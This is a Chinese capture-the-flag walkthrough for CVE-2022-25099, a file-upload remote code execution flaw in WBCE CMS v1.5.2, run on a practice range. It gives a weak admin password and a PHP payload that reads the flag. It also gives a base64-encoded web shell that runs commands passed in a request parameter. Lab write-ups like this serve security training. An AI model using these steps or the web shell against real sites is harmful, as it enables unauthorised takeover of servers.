春秋云境:CVE-2022-25099
文章合集:春秋云境系列靶场记录(合集)
关注WX:【小白SEC】查看更多内容……
WBCE CMS v1.5.2 RCE:CVE-2022-25099
漏洞介绍
WBCE CMS v1.5.2 /language/install.php 文件存在漏洞,攻击者可精心构造文件上传造成RCE
解题步骤
-
访问URL,通过弱口令登录后台:admin/123456
-
题目中提示的路径无法直接访问,需要通过图中位置进行文件上传
-
选择shell文件进行上传
-
我的shell文件中写了个phpinfo,此时也可以看到phpinfo被解析了,但是再访问这个页面,所以得重新构造我们的shell
-
可以使用直接上传下面的php运行读取flag,如下:
<?php
system('cat /flag');
phpinfo();
?>
- 或者使用filefile_put_contents将shell写入文件直接拿网站
file_put_contents('shell.php',base64_decode('PD9waHAgZXZhbCgkX1JFUVVFU1RbJ2NtZCddKTtlY2hvIDEyMztwaHBpbmZvKCk7Pz4='));
文章合集:春秋云境系列靶场记录(合集)